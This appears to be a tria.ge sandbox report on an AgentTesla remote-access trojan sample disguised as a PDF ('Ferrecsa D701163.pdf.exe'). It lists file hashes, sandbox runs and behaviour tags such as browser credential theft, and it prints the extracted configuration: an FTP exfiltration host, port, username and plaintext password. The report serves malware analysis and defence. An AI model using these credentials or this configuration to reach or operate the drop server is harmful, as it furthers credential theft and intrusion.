Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
General
-
Target
Ferrecsa D701163.pdf.exe
-
Size
1.2MB
-
Sample
240818-t3ng6awdpk
-
MD5
861b8fa009a52d4a2a0484b8c2673fb3
-
SHA1
379c013437d1f2956eb40772281754545a6ad124
-
SHA256
655a38b1686aa4f75f6dd4f2b59c8e9e09cde9997b46bafbe4e3dee38d859c99
-
SHA512
5d24eb0674278d40e26db482e06a301ccca675a1454593868929fde24def1dcc6431ecee123fa05ec2907c375d2220d8499e68d15be5343e4e2ace529a6776f8
-
SSDEEP
24576:jiUmSB/o5d1ubcv7HAUJDeRSCJvYDxsHWaNL5ZUPNZjk9WtI5CtbXosz67:j/mU/ohubcv77qRNBSMNLgPNYWi5Ctzc
Behavioral task
behavioral1
Sample
Ferrecsa D701163.pdf.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
Ferrecsa D701163.pdf.exe
Resource
win10v2004-20240802-en
Malware Config
Extracted
agenttesla
Protocol: ftp- Host:
ftp://ftp.corpsa.net - Port:
21 - Username:
[email protected] - Password:
HMcJs([wrG~1
Targets
-
-
Target
Ferrecsa D701163.pdf.exe
-
Size
1.2MB
-
MD5
861b8fa009a52d4a2a0484b8c2673fb3
-
SHA1
379c013437d1f2956eb40772281754545a6ad124
-
SHA256
655a38b1686aa4f75f6dd4f2b59c8e9e09cde9997b46bafbe4e3dee38d859c99
-
SHA512
5d24eb0674278d40e26db482e06a301ccca675a1454593868929fde24def1dcc6431ecee123fa05ec2907c375d2220d8499e68d15be5343e4e2ace529a6776f8
-
SSDEEP
24576:jiUmSB/o5d1ubcv7HAUJDeRSCJvYDxsHWaNL5ZUPNZjk9WtI5CtbXosz67:j/mU/ohubcv77qRNBSMNLgPNYWi5Ctzc
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Credentials from Password Stores: Credentials from Web Browsers
Malicious Access or copy of Web Browser Credential store.
-
AutoIT Executable
AutoIT scripts compiled to PE executables.
-
Suspicious use of SetThreadContext
-